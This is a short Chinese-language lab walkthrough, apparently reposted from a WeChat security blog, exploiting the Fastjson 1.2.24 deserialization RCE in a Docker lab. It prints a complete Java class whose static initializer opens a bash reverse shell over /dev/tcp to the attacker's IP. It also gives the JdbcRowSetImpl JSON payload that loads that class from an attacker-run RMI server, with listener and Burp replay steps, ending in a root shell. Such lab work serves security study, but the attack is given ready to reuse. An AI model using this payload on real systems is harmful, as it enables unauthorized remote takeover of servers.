一、环境搭建
机器:kali Linux
Java:jdk8
python:python3.7.x
二、搭建靶机环境
在docker里面搭建一个靶机环境
看看能不能访问
三、构建payload
将下列代码放进backshell.java
import java.lang.Runtime;
import java.lang.Process;public class backshell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.217.128/7777 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
用javac进行编译
查看编译是否成功
放进kali里面查看
四、用python搭建恶意站点
五、用插件开启rmi监听
六、用nc开启监听
七、用BP抓包
用BP抓包,然后修改POST传参方法,放到重放器模块,写入恶意类
{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.217.128:9999/backshell", "autoCommit":true } }
修改数据类型为json,点击发送
八、查看监听的shell
发现反弹shell成功,命令符在手,还是root权限,一切你说了算!
原文始发于微信公众号(黄公子学安全):Fastjson-1.2.24-rce
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论